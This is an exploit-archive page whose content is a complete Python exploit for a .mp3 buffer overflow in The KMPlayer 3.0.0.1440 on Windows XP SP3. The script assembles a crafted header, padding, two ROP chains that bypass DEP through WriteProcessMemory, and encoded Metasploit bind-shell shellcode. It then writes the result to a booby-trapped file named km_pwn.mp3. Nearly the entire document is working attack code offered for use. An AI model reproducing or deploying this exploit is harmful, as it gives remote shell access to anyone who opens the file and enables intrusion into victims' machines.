The KMPlayer 3.0.0.1440 .mp3 Buffer Overflow Exploit XPSP3 DEP Bypass



EKU-ID: 429 CVE: OSVDB-ID:
Author: dookie and ronin Published: 2011-06-07 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/python
#
# The KMPlayer 3.0.0.1440 .mp3 Buffer Overflow Exploit XPSP3 DEP Bypass
#
# Downloaded from: http://download.cnet.com/The-KMPlayer/3000-13632_4-10659939.html
#
# 06 Jun 11
#
# Cobbled together by dookie and ronin
#
# This exploit performs DEP bypass on WinXP SP3 with 2 different offsets.
# In our testing environments, there were 2 separate offsets. One offset
# applies to VMs running on Xen and VMware workstation for Linux. The
# second offset applies to ESXi and VMware Fusion.

import os

evilfile = "km_pwn.mp3"

head = "\x77\x44\x37\x03\x00\x00\x00\x00\x1F\x76\x54\x49\x54\x32\x00\x00\x13\x16\x00\x00\x00\xD6\x6D\x61\x73\x68\x69\x6E\x67\x20\x54\x68\x65\x20\x4F\x70\x70\xFA\x6E\x52\xCC\x74\x86\x41\x4C\x42\x00\x00\x00\x15\x00\x00\x00\xE7\x65\xE1\x65\x6E\x64\x20\x4F\x66\x20\x54\x68\x65\x20\x42\x6C\x61\x63\x6B\x20\xE3\x68\x61\x77\xEF\x72\x6D\x61\x54\x52\x13\x4B\x70\x00\x00\x3E\x00\x00\x00\x34\x8C\xA5\x45\x52\x73\x00\x00\x05\x00\x00\xD2\x32\xDC\x30\x39\x54\x43\x4F\x4E\x00\x00\x00\x0C\x00\x00\x00\x1A\x50\x79\x63\x16\x65\x64\x65\x6C\x69\x9B\x65\x60\x69\x4D\x81\x00\x00\x3C\x00\x32\x00\xEC\x6E\x67\xCD\x55\x50\x45\x54\x45\x4E\x43\x63\x00\x00\xEB\x00\x00\x70\x4C\x61\x6D\x65\x20\x33\x2E\x7A\x37\x54\x4C\x41\x4E\x00\x96\x00\x08\x00\x00\x00\x45\x79\x67\x6F\x69\x73\x68\x50\x7C\x49\x56\x00\x99\xDB\x29\x00\x00\x57\x4D\x3C\x4D\x54\xDB\x69\x61\x43\x6C\x61\x73\x85\x53\x65\xDB\x6F\xE1\x64\x61\x72\x79\x68\x44\xF6\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xAE\x00\x00\x00\x00\x00\x50\x52\x49\xCF\x00\x00\xE6\x27\x00\x00\x57\x4D\x2F\x4D\x65\xE6\x69\x61\x43\x6C\x61\x73\x73\x50\x32\x69\xC0\x61\x72\x79\xC0\x44\x00\xBC\x51\x4D\x30\x23\xE3\xE2\x4B\x86\xA1\x48\xA2\xB0\x28\x44\x1E\x50\x52\x49\x56\x00\x00\x00\xAA\x0B\x00\x57\x9A\x2F\x50\x72\x6F\x1E\x69\x50\xA1\x72\x00\xC3\x00\x4D\x00\x47\x79\x00\x00\x50\x52\x49\x56\x00\x00\x00\x1F\x00\x00\x57\x6C\x2F\x57\x4D\x4E\x6F\x6E\x74\x65\x6E\xF7\x49\x44\x00\x03\x6A\x21\x12\x66\x52\x4D\x49\x93\x83\xD6\x39\xB3\x6E\x1A\x76\xA6\x52\x49\x56\xC2\x20\x00\x57\x00\x00\xA2\x4D\x2F\x57\x59\x43\x25\x6C\x6C\x65\x0C\x74\xE2\x8E\x6E\x1F\x44\x01\xEC\x4B\xF3\xAB\xEB\x1C\xD1\x4C\xBF\x29\x8F\x8D\xC3\x7D\xA2\x74\x50\x52\x49\xC3\x00\x4E\x00\x27\x83\x00\x57\x4D\x2F\x57\x4D\x43\x6F\x6C\x6C\xC6\x63\x74\x69\x6F\x6E\x47\x72\x6F\x75\x70\x49\x44\x00\xEC\xFA\xF3\xAB\xEC\x1C\xD1\x4C\x90\x22\x8F\x8D\xC3\x06\xA2\x0F\x54\x50\x55\x42\x00\x00\x38\x08\x00\x50\x00\x48\x59\xEE\x6D\x65\x67\x61\x50\x1F\x49\x56\x00\x00\x00\x23\x00\x00\x57\x4D\x2F\x9B\x6E\xB4\x71\x75\xE0\x46\x69\x6C\x65\x49\x64\x65\x6E\x74\x69\x66\x69\x65\xEB\x00\x41\x00\x4D\x00\x47\x00\x61\x00\x0B\x00\x69\x00\x64\x00\x3D\x00\x52\x00\x20\x00\x20\x00\x31\x00\x17\x00\x37\x00\x32\x00\x34\x00\x37\x00\x34\xFD\xB5\x00\x55\x00\x4D\x00\x47\xCE\x70\x62\x5F\xAB\x69\x2F\x64\x00\x3D\x00\x50\x00\x20\x00\x20\x00\x20\xA6\x34\x00\x37\x6C\x35\x0E\x32\x00\x39\x00\x30\x00\xCE\xBB\x41\x00\x2A\x00\x47\x00\x74\x80\x5F\x00\x71\x00\x64\x00\x3D\x00\x3E\x04\x7C\x00\x31\x00\x37\x00\x36\x00\xBC\x00\x31\x00\xA7\xC0\x32\x8E\x33\x00\x00\x00\x54\x50\x45\x32\x00\x7C\x50\x12\x00\x17\xAE\x49\x6E\x66\x5E\xCB\x74\x65\xAC\x20\x4D\x75\x73\x68\x72\x6F\x6F\x6D\x54\x43\x4F\x4D\x40\x00\x00\x23\x00\x00\xA0\xCB\x6D\x69\x74\x64\xD0\x10\x75\x76\x49\x65\x76\x9F\xCB\x96\x75\x76\x1E\x65\x76\x61\x6E\x69\x2F\x45\x72\xBC\x7A\x20\x45\x69\xB5\x65\x6E\x54\x50\xF8\x31\x00\x00\x00\x25\x00\x00\x47\x49\x6E\x66\x65\x63\x74\x65\x64\x20\x4D\x75\x1E\x68\x72\x6F\x6D\x6F\x56\x20\x20\x73\x4A\x20\x6E\x6F\x9C\x61\x61\x68\x20\x6E\x61\x7E\x69\x76\x00\xDB\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x00\x24\x00\x00\x00\x00\x00\x00\x00\x75\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA2\x00\x00\x9D\x00\x00\x00\x00\x7F\xEB\x79\x82\x00\x75\x00\x00\x00\xDF\x00\x00\x00\x00\x00\x93\x00\x00\x00\x00\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x52\x00\x00\xCA\x00\x00\x00\x00\xE5\x00\x00\xEA\xAF\x00\xFE\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4D\x00\x00\x00\x00\x00\x00\x15\x00\xB3\x00\x00\x00\xC4\x50\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\xEA\x00\x00\x00\x00\x66\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x2F\x00\x10\x00\x00\x00\x00\x00\xC8\x00\x00\x00\x00\x00\x00\x00\x00\xE4\x00\x00\x00\x00\x00\x2C\x7E\x00\x00\x00\x00\x00\x00\x56\x00\x00\x00\x00\x00\x00\x6F\x00\x00\xEC\x00\x00\x00\x40\x00\x83\x57\x00\x88\x00\x00\x00\x11\x00\x81\x00\x00\x00\x00\xBC\x00\x00\x00\x00"

cruft = "\x85" * 3162
nops = "\x90" * 28
nops += "\x91\x90\x90\x90"  # The last byte gets decremented in rop2 while pointing EAX at the shellcode
nops += "\x90" * 20

#shellcode = "\xcc" * 368  # Size of bind shell

#root@bt:~# msfpayload windows/shell_bind_tcp R|msfencode -b '\x00\x0a\x0d' -t c
#[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)

shellcode = ("\xbd\xcf\xd8\x7c\xd0\xdd\xc1\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x56\x31\x68\x13\x83\xc0\x04\x03\x68\xc0\x3a\x89\x2c\x36\x33"
"\x72\xcd\xc6\x24\xfa\x28\xf7\x76\x98\x39\xa5\x46\xea\x6c\x45"
"\x2c\xbe\x84\xde\x40\x17\xaa\x57\xee\x41\x85\x68\xde\x4d\x49"
"\xaa\x40\x32\x90\xfe\xa2\x0b\x5b\xf3\xa3\x4c\x86\xfb\xf6\x05"
"\xcc\xa9\xe6\x22\x90\x71\x06\xe5\x9e\xc9\x70\x80\x61\xbd\xca"
"\x8b\xb1\x6d\x40\xc3\x29\x06\x0e\xf4\x48\xcb\x4c\xc8\x03\x60"
"\xa6\xba\x95\xa0\xf6\x43\xa4\x8c\x55\x7a\x08\x01\xa7\xba\xaf"
"\xf9\xd2\xb0\xd3\x84\xe4\x02\xa9\x52\x60\x97\x09\x11\xd2\x73"
"\xab\xf6\x85\xf0\xa7\xb3\xc2\x5f\xa4\x42\x06\xd4\xd0\xcf\xa9"
"\x3b\x51\x8b\x8d\x9f\x39\x48\xaf\x86\xe7\x3f\xd0\xd9\x40\xe0"
"\x74\x91\x63\xf5\x0f\xf8\xeb\x3a\x22\x03\xec\x54\x35\x70\xde"
"\xfb\xed\x1e\x52\x74\x28\xd8\x95\xaf\x8c\x76\x68\x4f\xed\x5f"
"\xaf\x1b\xbd\xf7\x06\x23\x56\x08\xa6\xf6\xf9\x58\x08\xa8\xb9"
"\x08\xe8\x18\x52\x43\xe7\x47\x42\x6c\x2d\xfe\x44\xa2\x15\x53"
"\x23\xc7\xa9\x42\xef\x4e\x4f\x0e\x1f\x07\xc7\xa6\xdd\x7c\xd0"
"\x51\x1d\x57\x4c\xca\x89\xef\x9a\xcc\xb6\xef\x88\x7f\x1a\x47"
"\x5b\x0b\x70\x5c\x7a\x0c\x5d\xf4\xf5\x35\x36\x8e\x6b\xf4\xa6"
"\x8f\xa1\x6e\x4a\x1d\x2e\x6e\x05\x3e\xf9\x39\x42\xf0\xf0\xaf"
"\x7e\xab\xaa\xcd\x82\x2d\x94\x55\x59\x8e\x1b\x54\x2c\xaa\x3f"
"\x46\xe8\x33\x04\x32\xa4\x65\xd2\xec\x02\xdc\x94\x46\xdd\xb3"
"\x7e\x0e\x98\xff\x40\x48\xa5\xd5\x36\xb4\x14\x80\x0e\xcb\x99"
"\x44\x87\xb4\xc7\xf4\x68\x6f\x4c\x04\x23\x2d\xe5\x8d\xea\xa4"
"\xb7\xd3\x0c\x13\xfb\xed\x8e\x91\x84\x09\x8e\xd0\x81\x56\x08"
"\x09\xf8\xc7\xfd\x2d\xaf\xe8\xd7")

##################### ROP Chain for VMware Workstation (Linux) and Xen #####################

eip = "\x71\x14\x40\x00"  # 00401471   RETN Pivot to the stack
toesp = "\x42" * 4
wpm = "\x13\x22\x80\x7c"  # 7C802213 WriteProcessMemory - XPSP3
wpm += "\x20\x1f\x45\x02"  # 02451F20 in_wm.dll - Return after WPM
wpm += "\xff\xff\xff\xff"  # hProcess
wpm += "\x10\x1f\x45\x02"  # 02451F10 in_wm.dll - Address to Patch
wpm += "\xbe\xba\xfe\xca"  # lpBuffer placeholder (Shellcode Address)
wpm += "\xce\xfa\xed\xfe"  # nSize placeholder (Shellcode Size)
wpm += "\xc0\x2b\x45\x02"  # 02452BC0 in_wm.dll - Pointer for Written Bytes

# Get a copy of ESP into a register
rop1 = "\x4f\x92\x71\x13"  # 1371924F :  {POP}  # PUSH ESP # POP EDI # POP ESI # POP EBP # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,50 # RETN 8 (IN_MP3.dll)
rop1 += "\x41" * 12    # Junk to be popped into ESI, EBP, and EBX
junk = "\x61" * 52    # Junk in between our VirtualProtect parameters and the next ROP chain

# Put a copy of the saved ESP from EDI into EAX
rop2 = "\x75\x66\x8a\x5b"  # 5B8A6675 :  # PUSH EDI # POP EAX # RETN (NETAPI32.dll)
rop2 += "\x41" * 8    # Compensate for the RETN 8 in rop1
# Increase EAX to point at our shellcode
rop2 += "\x37\x75\x37\x02"  # 02377537 :  # ADD EAX,84 # DEC DWORD PTR DS:[EAX] # RETN (in_mp4.dll)
rop2 += "\x37\x75\x37\x02"  # 02377537 :  # ADD EAX,84 # DEC DWORD PTR DS:[EAX] # RETN (in_mp4.dll)

# Write the address of the shellcode into the lpBuffer placeholder
# First need to put EAX in a safe spot then juggle around EDI to get it to ESI
rop2 += "\xc3\x87\xec\x76"  # 76EC87C3 :  # XCHG EAX,EDX # RETN (TAPI32.dll)
rop2 += "\x75\x66\x8a\x5b"  # 5B8A6675 :  # PUSH EDI # POP EAX # RETN (NETAPI32.dll)
rop2 += "\xd8\xc3\x3c\x76"  # 763CC3D8 :  # XCHG EAX,ESI # RETN (comdlg32.dll)
rop2 += "\xc3\x87\xec\x76"  # 76EC87C3 :  # XCHG EAX,EDX # RETN (TAPI32.dll)
rop2 += "\xbe\x9c\xca\x76"  # 76CA9CBE :  # MOV DWORD PTR DS:[ESI+1C],EAX # MOV EAX,ESI # POP ESI # RETN (IMAGEHLP.dll)
rop2 += "\x41" * 4    # Junk to be popped into ESI

# Get the intial ESP value back into ESI
rop2 += "\xe6\x57\x01\x15"  #150157E6 :  {POP}  # DEC ESI # PUSH EAX # POP ESI # POP EBX # POP ECX # RETN (in_nsv.dll)
rop2 += "\x41" * 8    # Junk to be popped into EBX and ECX

# Get the initial ESP value back into ESI
rop2 += "\xd8\xc3\x3c\x76"  # 763CC3D8 :  # XCHG EAX,ESI # RETN (comdlg32.dll)

# Zero EAX and set it to the shellcode size (0x200)
rop2 += "\xc0\x11\x37\x02"  # 023711C0 :  # XOR EAX,EAX # RETN (in_mp4.dll)
rop2 += "\xe9\x0b\x44\x02"  # 02440BE9 :  # ADD EAX,100 # POP EBP # RETN (in_wm.dll)
rop2 += "\x41" * 4    # Junk to be popped into EBP
rop2 += "\xe9\x0b\x44\x02"  # 02440BE9 :  # ADD EAX,100 # POP EBP # RETN (in_wm.dll)
rop2 += "\x41" * 4    # Junk to be popped into EBP

# Write the shellcode size into the nSize placeholder
rop2 += "\x3f\xcf\x9e\x7c"  # 7C9ECF3F :  {POP}  # MOV DWORD PTR DS:[ESI+20],EAX # MOV EAX,ESI # POP ESI # POP EBP # RETN 4 (shell32.dll)
rop2 += "\x41" * 8    # Junk to be popped into ESI and EBP

# Point EAX to the WPM setup on the stack, push EAX and POP it into ESP
rop2 += "\x41\x15\x5d\x77"  # 775D1541 :  # SUB EAX,4 # RETN (ole32.dll)
rop2 += "\x41" * 4
rop2 += "\x51\xeb\x43\x02"  # 0243EB51 :  # ADD EAX,0C # RETN (in_wm.dll)
rop2 += "\xce\x05\x42\x02"  # 024205CE :  {POP}  # PUSH EAX # POP ESP # POP ESI # RETN (in_wm.dll)
rop2 += "\x41" * 4    # Junk to be popped into ESI

rop2 += "\x41" * 32

############################# ROP Chain for VMware Fusion and ESXi ############################

###############################################################################################
## ROP_1 = all about the jump back to a bigger buffer, for ROP_2 construction
###############################################################################################
#put this in ESI to use it for subtraction from ESP. need to land in the big buffer 14830 = 39ee
jmp_value = "\xf0\x38\x00\x00"
rop_1 = "\x46"*4
#0x7744802C :  # INC EDX # PUSH ESP # MOV EAX,EDX # POP EDI # RETN (comctl32.dll)  **
rop_1 += "\x2c\x80\x44\x77"
#0x5B8A6675 :  # PUSH EDI # POP EAX # RETN (NETAPI32.dll)  **
rop_1 += "\x75\x66\x8a\x5b"
#0x7C926021 :  {POP}  # SUB EAX,ESI # POP ESI # POP EBP # RETN (ntdll.dll)  **
rop_1 += "\x21\x60\x92\x7c"
rop_1 += "\x50" * 8
#0x7E451509 :  # XCHG EAX,ESP # RETN   (USER32.dll)  **
rop_1 += "\x09\x15\x45\x7e"
###############################################################################################


filler_a1 = "\x41"*360


###############################################################################################
## ROP_2 = all about the shell
###############################################################################################

######### SAVING STACKPOINTERS ################################################################
#0x7744802C :  # INC EDX # PUSH ESP # MOV EAX,EDX # POP EDI # RETN (comctl32.dll)  **
rop_2 = "\x2c\x80\x44\x77"
#0x5B8A6675 :  # PUSH EDI # POP EAX # RETN (NETAPI32.dll)  **
rop_2 += "\x75\x66\x8a\x5b"
#0x5B8A9F1E :  # ADD ESP,44 # POP EBP # RETN 1C (NETAPI32.dll)  **
rop_2 += "\x1e\x9f\x8a\x5b"
rop_2 += "\x43\x43\x43\x43"

#WriteProcessMemory construct with the two placeholders we need to generate on the fly
###############################################################################################
rop_2 += "\x13\x22\x80\x7c" #WriteProcMem - XPSP3
rop_2 += "\x00\x2e\x98\x7c" #ntdll - patching target
rop_2 += "\xff\xff\xff\xff"     #hProcess
rop_2 += "\x00\x2e\x98\x7c"     #ntdll - patching target
rop_2 += "\xbe\xba\xfe\xca"     #lpBuffer placeholder (Shellcode Address)
rop_2 += "\xce\xfa\xed\xfe"     #lpBuffer placeholder (Shellcode Size)
rop_2 += "\10\x20\x98\x7c"      #writeable location in ntdll
###############################################################################################

######### FIRST PARAM - lpBuffer placeholder (Shellcode Address)###############################
#gadgets (plus various paddings) used to construct the memory address which will point to our shellcode
#then we write the value to the correct memory address and restore EAX
rop_2 += "\x44" * 40
#0x7C974E8E :  # ADD EAX,100 # POP EBP # RETN  (ntdll.dll)  **
rop_2 += "\x8e\x4e\x97\x7c"
rop_2 += "\x44" *32
rop_2 += "\x8e\x4e\x97\x7c"
rop_2 += "\x44"*4
#0x7E45DA8D :  # XCHG EAX,EBP # RETN   (USER32.dll)  **
rop_2 += "\x8d\xda\x45\x7e"
#0x77DD994E :  # XCHG EAX,EDI # RETN 2 (ADVAPI32.dll)  **
rop_2 += "\x4e\x99\xdd\x77"
#0x7C910C66 :  # XCHG EAX,ESI # RETN 2 (ntdll.dll)  **
rop_2 += "\x66\x0c\x91\x7c"
#padding
rop_2 += "\x44" * 2
#0x7E45DA8D :  # XCHG EAX,EBP # RETN   (USER32.dll)  **
rop_2 += "\x8d\xda\x45\x7e"
#padding
rop_2 += "\x44"*2
#0x76CA9CBE :  # MOV DWORD PTR DS:[ESI+1C],EAX # MOV EAX,ESI # POP ESI # RETN  (IMAGEHLP.dll)  **
rop_2 += "\xbe\x9c\xca\x76"
###############################################################################################


######### SIZE PARAM - lpBuffer placeholder (Shellcode Size) ##################################
#gadgets (plus various paddings) used to construct the size value for our buffer (using 0x200 bytes)
#then we write the value to the correct memory address and restore EAX
rop_2 += "\x47" *4
#0x775D156E :  # PUSH EAX # POP ESI # RETN (ole32.dll)  **
rop_2 += "\x6e\x15\x5d\x77"
#0x7E433785 :  # XOR EAX,EAX # RETN 4  (USER32.dll)  **
rop_2 += "\x85\x37\x43\x7e"
#0x7C974E8E :  # ADD EAX,100 # POP EBP # RETN  (ntdll.dll)  **
rop_2 += "\x8e\x4e\x97\x7c"
rop_2 += "\x45"*8
rop_2 += "\x8e\x4e\x97\x7c"
rop_2 += "\x45"*4
#0x75D0AA2E :  # MOV DWORD PTR DS:[ESI+20],EAX # MOV EAX,ESI # POP ESI # RETN  (mlang.dll)  **
rop_2 += "\x2e\xaa\xd0\x75"
###############################################################################################

###############################################################################################
######### Realigning EAX to point to WPM and setting ESP to it ################################
rop_2 += "\x50" * 4
#0x76CAF118 :  # ADD EAX,0C # RETN (IMAGEHLP.dll)  **
rop_2 += "\x18\xf1\xca\x76"
#0x7E451509 :  # XCHG EAX,ESP # RETN   (USER32.dll)  **
rop_2 += "\x09\x15\x45\x7e"
rop_2 += "\x43"*316
###############################################################################################

##################### VARIOUS PADDINGS AND OTHER NONSENSE #####################################
#slide into the shell
nops_7 = "\x90"*56
#after the shell junk
filler_a2 = "\x42" * (3200)
###############################################################################################

############################# PUTTING IT TOGETHER #############################################
filler_a = filler_a1 + rop_2 + nops_7 +shellcode +filler_a2
#small buffer filler
filler_b = "\x44" * (95)
#the whole shebang (ronin's version)
filler = filler_a+jmp_value+eip+rop_1+filler_b
###############################################################################################

 

sploit = head + cruft + eip + toesp + rop1 + wpm + junk + rop2 + nops + shellcode + filler

crashy = open(evilfile,"w")
crashy.write(sploit)
crashy.close()